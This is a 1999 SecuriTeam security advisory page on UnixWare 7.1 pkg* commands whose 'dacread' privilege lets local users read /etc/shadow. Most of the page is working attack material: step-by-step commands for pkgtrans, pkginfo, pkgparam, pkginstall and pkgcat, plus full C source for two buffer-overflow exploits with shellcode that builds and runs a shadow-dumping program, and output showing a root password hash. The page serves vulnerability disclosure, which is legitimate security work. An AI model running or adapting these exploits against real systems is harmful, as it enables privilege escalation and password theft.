Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	UnixWare pkg* command exploits 7 Dec. 1999    Summary Most of UnixWare's pkg commands can be exploited to print the /etc/shadow file, leading to an easy root compromise (since it possible to brute force the encryption algorithm with which the passwords are protected).   Credit: This information has been provided by: Brock Tellier. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable systems: UnixWare 7.1 The permissions for the UnixWare pkg commands are as follows: bash-2.02$ ls -la /usr/sbin/pkgchk /usr/bin/pkginfo /usr/bin/pkgparam /usr/bin/pkgtrans /usr/sadm/install/bin/pkgname /usr/sbin/pkgcat /usr/sbin/pkginstall -r-xr-xr-x   1 bin    sys       176620 May 21 1999 /usr/bin/pkginfo -r-xr-xr-x   1 root   sys       166784 May 21 1999 /usr/bin/pkgparam -r-xr-xr-x   1 bin    bin       166216 May 21 1999 /usr/bin/pkgtrans -r-xr-xr-x   1 root   sys        3288 May 21 1999 /usr/sadm/install/bin/pkgname -rwxr-xr-x   1 root   bin       19436 May 21 1999 /usr/sbin/pkgcat -r-x------   1 root   sys       179440 May 21 1999 /usr/sbin/pkgchk -rwxr-xr-x   1 root   bin       19680 May 21 1999 /usr/sbin/pkginstall Note that none of these have any elevated mode bit-based privileges. Now let's check out /etc/security/tcb/privs: bash-2.02$ cat /etc/security/tcb/privs | grep pkg 179440:2448:939918606:%fixed,dacread:/usr/sbin/pkgchk 176620:53979:939918610:%fixed,dacread:/usr/bin/pkginfo 166784:32218:939918610:%fixed,dacread:/usr/bin/pkgparam 166216:46675:939918610:%fixed,dacread:/usr/bin/pkgtrans 3288:61136:939918611:%fixed,dacread:/usr/sadm/install/bin/pkgname 19436:55289:939918607:%fixed,dacread:/usr/sbin/pkgcat 19680:23331:939918607:%fixed,dacread:/usr/sbin/pkginstall All of these programs are vulnerable to '/etc/shadow' printing exploits. pkg* are able to access '/etc/shadow' because of the "dacread" permission, which allows the process to override the file permissions and ownership (but only for reading or executing). Two of the exploits below are buffer overflow exploits which execute '/tmp/pi'. '/tmp/pi' is a program built by the exploit which simply cats '/etc/shadow'. Thus any spawned process of a prived program gains the same privileges as that program. Exploits: -------------- pkgtrans For this exploit, download the file http://www.securiteam.com/exploits/dut.tar and follow the instructions below. dut.tar simply conforms to the pkgmap/info conventions and allows it to read '/etc/shadow'. bash-2.02$ cp dut.tar /tmp bash-2.02$ cd /tmp bash-2.02$ tar xvf dut.tar x dut/, 0 bytes, 0 tape blocks x dut/pkginfo, 276 bytes, 1 tape block x dut/pkgmap, 39 bytes, 1 tape block x dut/install/, 0 bytes, 0 tape blocks x dut/install/shadow symbolic link to /etc/shadow bash-2.02$ pkgtrans -s /tmp /tmp/pkgtrans.shadow The following packages are available:  1 dut   Brock Tellier's pkgtrans exploit, install and cat /tmp/pkgtrans.shadow for your copy of /etc/shadow          (IA32) .01a Select package(s) you wish to process (or 'all' to process all packages). (default: all) [?,??,quit]: 1 Transferring <dut> package instance to     </tmp/pkgtrans.shadow> in datastream format bash-2.02$ cat /tmp/trans.shadow | grep root root:rfAf3OC7XHsj.:10925:::::: ------------- pkginfo bash-2.02$ truss -rall -aefo pkginfo.out pkginfo -d /etc/shadow; cat pkginfo.out | grep "r o o t" UX:pkginfo: ERROR: attempt to process package from </etc/shadow> failed    - bad format in datastream table-of-contents truss: cannot control child process, pid# 9188 - KILL TRUSS PROCESS FROM ANOTHER VT - Killed 9187:   r o o t : r f A f 3 O C 7 X H s j . : 1 0 9 2 5 : : : : : :\n d ------------- pkginstall bash-2.02$ /usr/sbin/pkginstall -s `./uwpkgi 100`: UnixWare 7.1 pkginstall exploit prints/etc/shadow Brock Tellier btellier@usa.net Using addr: 0x8046c3d root:rfAf3OC7XHsj.:10925:::::: daemon:NP:6445:::::: bin:NP:6445:::::: ... -------------- pkgcat bash-2.02$ /usr/sbin/pkgcat -s `./uwpkgcat 100`: UnixWare 7.1 pkgcat exploit prints/etc/shadow Brock Tellier btellier@usa.net Using addr: 0x8046c3d root:rfAf3OC7XHsj.:10925:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: ... ------------ pkgparam bash-2.02$ pkgparam -f /etc/shadow rfAf3OC7XHsj.:10925:::::: NP:6445:::::: NP:6445:::::: ... Exploit code: --- uwpkgcat.c --- /** ** UnixWare 7.1 /usr/sbin/pkgcat exploit ** Prints contents of /etc/shadow (execing shell won't be enough here) ** Demonstrates overflow in uw71's gethostbyname() and dacread permission ** problems. Use offsets of +-100. ** ** Compile cc -o uwpkgcat uwpkgcat.c ** run /usr/sbin/pkgcat -s `./uwpkgcat 100`: ** ** Brock Tellier btellier@usa.net **/ #include <stdlib.h> #include <stdio.h> char scoshell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";                 #define LEN 3500 #define NOP 0x90 #define CODE "void main() { system(\"cat /etc/shadow\"); }\n" void buildpi() {  FILE *fp;  char cc[100];  fp = fopen("/tmp/pi.c", "w");  fprintf(fp, CODE);  fclose(fp);  snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c");  system(cc); } int main(int argc, char *argv[]) { long int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN]; buildpi(); if(argc > 3) {  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){   offset=atoi(argv[1]);    } else if (argc == 3) {  offset=atoi(argv[1]);  buflen=atoi(argv[2]);    } else {   offset=100;   buflen=3000; } addr=0x8046b75 + offset; fprintf(stderr, "\nUnixWare 7.1 pkgcat exploit prints"); fprintf(stderr, "/etc/shadow\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),scoshell,strlen(scoshell)); for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4) *(int *)&buf[i]=addr; buf[buflen - 1] = ':'; printf(buf); exit(0); } ------ --- uwpkgi.c --- /** ** UnixWare 7.1 /usr/sbin/pkginstall exploit ** Prints contents of /etc/shadow (execing shell won't be enough here) ** Demonstrates overflow in uw71's gethostbyname() and dacread permission ** problems. Use offsets of +-100. ** ** Compile cc -o uwpkgi uwpkgi.c ** run /usr/sbin/pkginstall -s `./uwpkgi 100`: ** ** Brock Tellier btellier@usa.net **/ #include <stdlib.h> #include <stdio.h> char scoshell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";                 #define LEN 3500 #define NOP 0x90 #define CODE "void main() { system(\"cat /etc/shadow\"); }\n" void buildpi() {  FILE *fp;  char cc[100];  fp = fopen("/tmp/pi.c", "w");  fprintf(fp, CODE);  fclose(fp);  snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c");  system(cc); } int main(int argc, char *argv[]) { long int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN]; buildpi(); if(argc > 3) {  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){   offset=atoi(argv[1]);    } else if (argc == 3) {  offset=atoi(argv[1]);  buflen=atoi(argv[2]);    } else {   offset=100;   buflen=3000; } addr=0x8046b75 + offset; fprintf(stderr, "\nUnixWare 7.1 pkginstall exploit prints"); fprintf(stderr, "/etc/shadow\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),scoshell,strlen(scoshell)); for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4) *(int *)&buf[i]=addr; buf[buflen - 1] = ':'; printf(buf); exit(0); }  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles RealNetworks RealPlayer Malformed AAC File Parsing Code Execution Vulnerability ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®